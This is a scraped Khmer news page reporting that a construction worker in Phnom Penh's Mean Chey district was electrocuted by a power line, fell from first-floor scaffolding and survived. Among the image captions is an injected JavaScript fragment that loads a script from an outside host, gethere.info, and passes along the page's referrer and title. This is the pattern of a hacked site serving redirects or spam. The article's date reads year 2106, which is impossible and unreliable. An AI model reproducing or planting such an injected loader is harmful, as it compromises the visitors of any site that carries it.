Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

កម្មករសំណង់ម្នាក់ត្រូវបានឆក់ខ្សែភ្លើង ធ្លាក់ពីលើអន្ទាជាន់ទី១ តែសំណាងល្អមិនគ្រោះថ្នាក់ដល់ជីវិត

ភ្នំពេញ៖ កម្មករសំណង់ម្នាក់ត្រូវបានឆក់ខ្សែភ្លើងបណ្ដាលអោយធ្លាក់ពីលើអន្ទាជាន់ទី១ តែសំណាងមិនគ្រោះថ្នាក់ដល់ជីវិត។ ហេតុការណ៍នេះបានកើតឡើងកាលពីវេលាម៉ោង ២ នឹង ២០នាទីថ្ងៃទី ២៧ខែ តុលា ឆ្នាំ២១០៦ នៅតាមបណ្ដោផ្លូវ៣៧១ក្នុងភូមិត្នោតជ្រុំ៣សង្កាត់បឹងទំពុន ខណ្ឌមានជ័យ។ ជនរងគ្រោះមានឈ្មោះ សាម ប្រុស ភេទប្រុសអាយុ៣៥ឆ្នាំ មុខរបរកម្មករសំណង់ ស្នាក់នៅកន្លែងកើតហេតុខាងលើហើយមានស្រុកកំណើតនៅភូមិប្រពំងវែងឃុំប្រាំងរាំង ស្រុកជុំគីរីខេត្តត្កំពត។

បើតាមការរៀបរាប់ពីក្រុមការងារជាមួយគ្នាបានប្រាប់អោយដឹងថាមុនពេលកើតហេតុពួកគេមានគ្នា៦ ទៅ ៧នាក់បាននាំគ្នាលើកជើងអន្ទារដើម្បីតទៅជាន់ខាងលើដើម្បីប៊ៀកថ្នាំ នៅជាន់បន្ដបន្ទាប់ខណៈដែលលើកជើងអន្ទារស្រាប់តែត្រូវចរន្ដភ្លើងឆ្លងពីខ្សែភ្លើងមេស្រាតដែលនៅចំងាយប្រមាណជា ១ ម៉ែត្រពីអន្ទារបណ្ដាលយឲ្យបុរសខាងលើឆក់ធ្លាក់ចុះមកក្រោម ភ្លាមៗនោះក្រុមការងារបាននាំយកជនរងគ្រោះទៅសង្គ្រោះ នៅមន្ទីពេទ្យឯកជនមួយ។

img_3313 img_3315s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More